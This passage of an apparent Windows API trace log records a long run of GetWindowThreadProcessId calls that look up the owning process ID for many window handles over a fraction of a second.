	[0710.047] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x460
	[0710.047] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x460
	[0710.047] GetWindowThreadProcessId (in: hWnd=0x30044, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x44c
	[0710.048] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x778
	[0710.048] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x460
	[0710.048] GetWindowThreadProcessId (in: hWnd=0x30140, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x558
	[0710.048] GetWindowThreadProcessId (in: hWnd=0x1005c, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x4d0
	[0710.048] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x4d0
	[0710.048] GetWindowThreadProcessId (in: hWnd=0x10a0c, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x1f0c
	[0710.048] GetWindowThreadProcessId (in: hWnd=0x10a08, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x1f08
	[0710.048] GetWindowThreadProcessId (in: hWnd=0x109fc, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x1ef0
	[0710.049] GetWindowThreadProcessId (in: hWnd=0x109ee, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x1eec
	[0710.049] GetWindowThreadProcessId (in: hWnd=0x109e0, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x1ee4
	[0710.049] GetWindowThreadProcessId (in: hWnd=0x109c6, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x1ed8
	[0710.049] GetWindowThreadProcessId (in: hWnd=0x109b6, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x1ed0
	[0710.049] GetWindowThreadProcessId (in: hWnd=0x1099c, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x1e8c
	[0710.049] GetWindowThreadProcessId (in: hWnd=0x1098e, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x1e88
	[0710.049] GetWindowThreadProcessId (in: hWnd=0x1097e, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x1e84
	[0710.049] GetWindowThreadProcessId (in: hWnd=0x20620, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x1604
	[0710.050] GetWindowThreadProcessId (in: hWnd=0x1095a, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x1c2c
	[0710.050] GetWindowThreadProcessId (in: hWnd=0x10966, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x1c08
	[0710.050] GetWindowThreadProcessId (in: hWnd=0x10964, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x1c0c
	[0710.050] GetWindowThreadProcessId (in: hWnd=0x10962, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x1c10
	[0710.050] GetWindowThreadProcessId (in: hWnd=0x1095e, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x1c14
	[0710.050] GetWindowThreadProcessId (in: hWnd=0x2043c, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x1c18
	[0710.050] GetWindowThreadProcessId (in: hWnd=0x206a6, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x1c1c
	[0710.050] GetWindowThreadProcessId (in: hWnd=0x4092e, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x16fc
	[0710.050] GetWindowThreadProcessId (in: hWnd=0x30426, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x1e78
	[0710.051] GetWindowThreadProcessId (in: hWnd=0x10956, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x1c20
	[0710.051] GetWindowThreadProcessId (in: hWnd=0x503ea, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x191c
	[0710.051] GetWindowThreadProcessId (in: hWnd=0x108c6, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x1748
	[0710.051] GetWindowThreadProcessId (in: hWnd=0x2037c, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x1bb4
	[0710.051] GetWindowThreadProcessId (in: hWnd=0x204d4, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x10bc
	[0710.051] GetWindowThreadProcessId (in: hWnd=0x20376, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x1b50
	[0710.051] GetWindowThreadProcessId (in: hWnd=0x108ba, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x14b4
	[0710.051] GetWindowThreadProcessId (in: hWnd=0x108b4, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x149c
	[0710.052] GetWindowThreadProcessId (in: hWnd=0x108ae, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x14a8
	[0710.052] GetWindowThreadProcessId (in: hWnd=0x108a2, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x1490
	[0710.052] GetWindowThreadProcessId (in: hWnd=0x10890, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x14a4
	[0710.052] GetWindowThreadProcessId (in: hWnd=0x1087e, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x148c
	[0710.052] GetWindowThreadProcessId (in: hWnd=0x1084a, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x1458
	[0710.052] GetWindowThreadProcessId (in: hWnd=0x10840, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x1b4c
	[0710.052] GetWindowThreadProcessId (in: hWnd=0x20616, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x1b3c
	[0710.053] GetWindowThreadProcessId (in: hWnd=0x10838, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x19bc
	[0710.053] GetWindowThreadProcessId (in: hWnd=0x10828, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x199c
	[0710.053] GetWindowThreadProcessId (in: hWnd=0x10824, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x1998
	[0710.053] GetWindowThreadProcessId (in: hWnd=0x10820, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x1994
	[0710.053] GetWindowThreadProcessId (in: hWnd=0x1081c, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x1990
	[0710.053] GetWindowThreadProcessId (in: hWnd=0x10812, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x1984
	[0710.053] GetWindowThreadProcessId (in: hWnd=0x1080c, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x197c
	[0710.054] GetWindowThreadProcessId (in: hWnd=0x10808, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x1978
	[0710.054] GetWindowThreadProcessId (in: hWnd=0x107e4, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x1824
	[0710.054] GetWindowThreadProcessId (in: hWnd=0x107d0, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x1088
	[0710.054] GetWindowThreadProcessId (in: hWnd=0x107c4, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x1908
	[0710.054] GetWindowThreadProcessId (in: hWnd=0x107b6, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x18cc
	[0710.054] GetWindowThreadProcessId (in: hWnd=0x1079c, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x18d0
	[0710.054] GetWindowThreadProcessId (in: hWnd=0x10792, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x1840
	[0710.055] GetWindowThreadProcessId (in: hWnd=0x10780, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x10c4
	[0710.055] GetWindowThreadProcessId (in: hWnd=0x1077a, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x128c
	[0710.055] GetWindowThreadProcessId (in: hWnd=0x10776, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x16e8
	[0710.055] GetWindowThreadProcessId (in: hWnd=0x204a2, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x16cc
	[0710.055] GetWindowThreadProcessId (in: hWnd=0x10768, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x274
	[0710.055] GetWindowThreadProcessId (in: hWnd=0x10764, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x10e0
	[0710.055] GetWindowThreadProcessId (in: hWnd=0x10760, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x10cc
	[0710.055] GetWindowThreadProcessId (in: hWnd=0x1075c, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x10c0
	[0710.056] GetWindowThreadProcessId (in: hWnd=0x30750, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x10d0
	[0710.056] GetWindowThreadProcessId (in: hWnd=0x1072e, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x1198
	[0710.056] GetWindowThreadProcessId (in: hWnd=0x10720, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x1080
	[0710.056] GetWindowThreadProcessId (in: hWnd=0x10712, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x1074
	[0710.056] GetWindowThreadProcessId (in: hWnd=0x10704, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x106c
	[0710.056] GetWindowThreadProcessId (in: hWnd=0x106cc, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x1474
	[0710.056] GetWindowThreadProcessId (in: hWnd=0x106c8, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x1414
	[0710.057] GetWindowThreadProcessId (in: hWnd=0x106c6, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xbd0
	[0710.057] GetWindowThreadProcessId (in: hWnd=0x106c2, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x550
	[0710.057] GetWindowThreadProcessId (in: hWnd=0x20370, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xa38
	[0710.057] GetWindowThreadProcessId (in: hWnd=0x202e8, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x16d0
	[0710.057] GetWindowThreadProcessId (in: hWnd=0x20338, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x16d4
	[0710.057] GetWindowThreadProcessId (in: hWnd=0x106b6, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x15bc
	[0710.057] GetWindowThreadProcessId (in: hWnd=0x10690, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x15a0
	[0710.057] GetWindowThreadProcessId (in: hWnd=0x10680, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x159c
	[0710.058] GetWindowThreadProcessId (in: hWnd=0x10670, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x1598
	[0710.058] GetWindowThreadProcessId (in: hWnd=0x10660, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x1594
	[0710.058] GetWindowThreadProcessId (in: hWnd=0x10650, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x1590
	[0710.058] GetWindowThreadProcessId (in: hWnd=0x10640, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x158c
	[0710.058] GetWindowThreadProcessId (in: hWnd=0x10630, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x1588
	[0710.058] GetWindowThreadProcessId (in: hWnd=0x1062c, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x1584
	[0710.058] GetWindowThreadProcessId (in: hWnd=0x10628, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x1580
	[0710.058] GetWindowThreadProcessId (in: hWnd=0x10624, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x157c
	[0710.058] GetWindowThreadProcessId (in: hWnd=0x1061e, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x1488
	[0710.059] GetWindowThreadProcessId (in: hWnd=0x10612, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x1404
	[0710.059] GetWindowThreadProcessId (in: hWnd=0x1060e, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x11b8
	[0710.059] GetWindowThreadProcessId (in: hWnd=0x105fc, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xbd4
	[0710.059] GetWindowThreadProcessId (in: hWnd=0x105ec, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xe0c
	[0710.059] GetWindowThreadProcessId (in: hWnd=0x105dc, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xd30
	[0710.059] GetWindowThreadProcessId (in: hWnd=0x105c8, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xe70
	[0710.059] GetWindowThreadProcessId (in: hWnd=0x105b8, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x13b8
	[0710.059] GetWindowThreadProcessId (in: hWnd=0x105a8, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xe20
	[0710.060] GetWindowThreadProcessId (in: hWnd=0x1058a, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xe2c
	[0710.060] GetWindowThreadProcessId (in: hWnd=0x1057a, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xe00
	[0710.060] GetWindowThreadProcessId (in: hWnd=0x10576, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xe04
	[0710.060] GetWindowThreadProcessId (in: hWnd=0x10570, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xc94
	[0710.060] GetWindowThreadProcessId (in: hWnd=0x10568, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x13b0
	[0710.060] GetWindowThreadProcessId (in: hWnd=0x10564, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x13ac
	[0710.060] GetWindowThreadProcessId (in: hWnd=0x10560, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x13a8
	[0710.060] GetWindowThreadProcessId (in: hWnd=0x1055a, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x1374
	[0710.061] GetWindowThreadProcessId (in: hWnd=0x10552, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x132c
	[0710.061] GetWindowThreadProcessId (in: hWnd=0x10544, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x1328
	[0710.061] GetWindowThreadProcessId (in: hWnd=0x1051c, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x12d0
	[0710.061] GetWindowThreadProcessId (in: hWnd=0x1050c, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x12cc
	[0710.061] GetWindowThreadProcessId (in: hWnd=0x104fc, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x12c8
	[0710.061] GetWindowThreadProcessId (in: hWnd=0x104da, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x1290
	[0710.061] GetWindowThreadProcessId (in: hWnd=0x104d0, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x1218
	[0710.061] GetWindowThreadProcessId (in: hWnd=0x104cc, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x1214
	[0710.062] GetWindowThreadProcessId (in: hWnd=0x104ca, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x11ec
	[0710.062] GetWindowThreadProcessId (in: hWnd=0x104c6, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x11e8
	[0710.062] GetWindowThreadProcessId (in: hWnd=0x202b4, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x11cc
	[0710.062] GetWindowThreadProcessId (in: hWnd=0x202b6, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x1140
	[0710.062] GetWindowThreadProcessId (in: hWnd=0x104be, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xe6c
	[0710.062] GetWindowThreadProcessId (in: hWnd=0x104ae, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x6e8
	[0710.062] GetWindowThreadProcessId (in: hWnd=0x10490, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xc6c
	[0710.063] GetWindowThreadProcessId (in: hWnd=0x10480, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xf94
	[0710.063] GetWindowThreadProcessId (in: hWnd=0x10470, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xffc
	[0710.063] GetWindowThreadProcessId (in: hWnd=0x10460, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xf74
	[0710.063] GetWindowThreadProcessId (in: hWnd=0x1044e, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xf08
	[0710.063] GetWindowThreadProcessId (in: hWnd=0x10442, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xf0c
	[0710.063] GetWindowThreadProcessId (in: hWnd=0x1043a, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xed8
	[0710.063] GetWindowThreadProcessId (in: hWnd=0x10436, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xe90
	[0710.063] GetWindowThreadProcessId (in: hWnd=0x10432, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xea8
	[0710.064] GetWindowThreadProcessId (in: hWnd=0x10416, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xfa8
	[0710.064] GetWindowThreadProcessId (in: hWnd=0x10412, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xfbc
	[0710.064] GetWindowThreadProcessId (in: hWnd=0x1040e, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xfb8
	[0710.064] GetWindowThreadProcessId (in: hWnd=0x1040a, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xfb4
	[0710.064] GetWindowThreadProcessId (in: hWnd=0x10406, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xfb0
	[0710.064] GetWindowThreadProcessId (in: hWnd=0x10402, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xfac
	[0710.064] GetWindowThreadProcessId (in: hWnd=0x103fe, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xfc0
	[0710.064] GetWindowThreadProcessId (in: hWnd=0x103f0, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xfd0
	[0710.065] GetWindowThreadProcessId (in: hWnd=0x1039a, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xf88
	[0710.065] GetWindowThreadProcessId (in: hWnd=0x1038a, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xf84
	[0710.065] GetWindowThreadProcessId (in: hWnd=0x10382, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xf80
	[0710.065] GetWindowThreadProcessId (in: hWnd=0x1036e, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xde0
	[0710.065] GetWindowThreadProcessId (in: hWnd=0x1036a, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xddc
	[0710.065] GetWindowThreadProcessId (in: hWnd=0x10366, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xdd8
	[0710.065] GetWindowThreadProcessId (in: hWnd=0x10360, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xd34
	[0710.065] GetWindowThreadProcessId (in: hWnd=0x10358, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xd10
	[0710.065] GetWindowThreadProcessId (in: hWnd=0x20276, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xd0c
	[0710.066] GetWindowThreadProcessId (in: hWnd=0x800a4, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xc9c
	[0710.066] GetWindowThreadProcessId (in: hWnd=0x10346, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xc74
	[0710.066] GetWindowThreadProcessId (in: hWnd=0x1032c, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xc1c
	[0710.066] GetWindowThreadProcessId (in: hWnd=0x10318, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xc08
	[0710.066] GetWindowThreadProcessId (in: hWnd=0x102fa, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xabc
	[0710.066] GetWindowThreadProcessId (in: hWnd=0x102e0, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x24c
	[0710.066] GetWindowThreadProcessId (in: hWnd=0x102dc, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xbb0
	[0710.066] GetWindowThreadProcessId (in: hWnd=0x102d2, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xbfc
	[0710.066] GetWindowThreadProcessId (in: hWnd=0x102ce, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xb10
	[0710.067] GetWindowThreadProcessId (in: hWnd=0x102ca, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x374
	[0710.067] GetWindowThreadProcessId (in: hWnd=0x102c6, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x368
	[0710.067] GetWindowThreadProcessId (in: hWnd=0x102c2, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xb28
	[0710.067] GetWindowThreadProcessId (in: hWnd=0x102be, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xae8
	[0710.067] GetWindowThreadProcessId (in: hWnd=0x102b2, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xb14
	[0710.067] GetWindowThreadProcessId (in: hWnd=0x102ae, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x95c
	[0710.067] GetWindowThreadProcessId (in: hWnd=0x102aa, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xa8c
	[0710.067] GetWindowThreadProcessId (in: hWnd=0x202a0, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x46c
	[0710.067] GetWindowThreadProcessId (in: hWnd=0x10264, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xb3c
	[0710.067] GetWindowThreadProcessId (in: hWnd=0x10254, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xa90
	[0710.067] GetWindowThreadProcessId (in: hWnd=0x10244, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xad0
	[0710.068] GetWindowThreadProcessId (in: hWnd=0x1022a, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xa9c
	[0710.068] GetWindowThreadProcessId (in: hWnd=0x10226, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xaa0
	[0710.068] GetWindowThreadProcessId (in: hWnd=0x10222, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xb1c
	[0710.068] GetWindowThreadProcessId (in: hWnd=0x1021e, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x7e0
	[0710.068] GetWindowThreadProcessId (in: hWnd=0x10216, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xa74
	[0710.068] GetWindowThreadProcessId (in: hWnd=0x20208, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x694
	[0710.068] GetWindowThreadProcessId (in: hWnd=0x401f0, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xa28
	[0710.069] GetWindowThreadProcessId (in: hWnd=0x1020c, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x9b0
	[0710.069] GetWindowThreadProcessId (in: hWnd=0x10202, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x8d8
	[0710.069] GetWindowThreadProcessId (in: hWnd=0x201ca, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x940
	[0710.069] GetWindowThreadProcessId (in: hWnd=0x201d8, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x93c
	[0710.069] GetWindowThreadProcessId (in: hWnd=0x301e2, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x4ec
	[0710.069] GetWindowThreadProcessId (in: hWnd=0x201de, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x150
	[0710.069] GetWindowThreadProcessId (in: hWnd=0x201c8, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x720
	[0710.069] GetWindowThreadProcessId (in: hWnd=0x301f4, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x3c4
	[0710.069] GetWindowThreadProcessId (in: hWnd=0x301c0, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x7d4
	[0710.069] GetWindowThreadProcessId (in: hWnd=0x301c4, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x6c8
	[0710.070] GetWindowThreadProcessId (in: hWnd=0x4011e, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xb54
	[0710.070] GetWindowThreadProcessId (in: hWnd=0x50122, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xb54
	[0710.070] GetWindowThreadProcessId (in: hWnd=0x108f8, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x6bc
	[0710.070] GetWindowThreadProcessId (in: hWnd=0x501b8, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xb5c
	[0710.070] GetWindowThreadProcessId (in: hWnd=0x101b2, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x838
	[0710.070] GetWindowThreadProcessId (in: hWnd=0x101ae, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x818
	[0710.070] GetWindowThreadProcessId (in: hWnd=0x101aa, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x5b8
	[0710.070] GetWindowThreadProcessId (in: hWnd=0x101a6, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x494
	[0710.070] GetWindowThreadProcessId (in: hWnd=0x101a2, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x1ec
	[0710.070] GetWindowThreadProcessId (in: hWnd=0x1019e, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x440
	[0710.071] GetWindowThreadProcessId (in: hWnd=0x1019a, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x7e8
	[0710.071] GetWindowThreadProcessId (in: hWnd=0x10196, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x730
	[0710.071] GetWindowThreadProcessId (in: hWnd=0x10192, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x2c8
	[0710.071] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x31c
	[0710.071] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x330
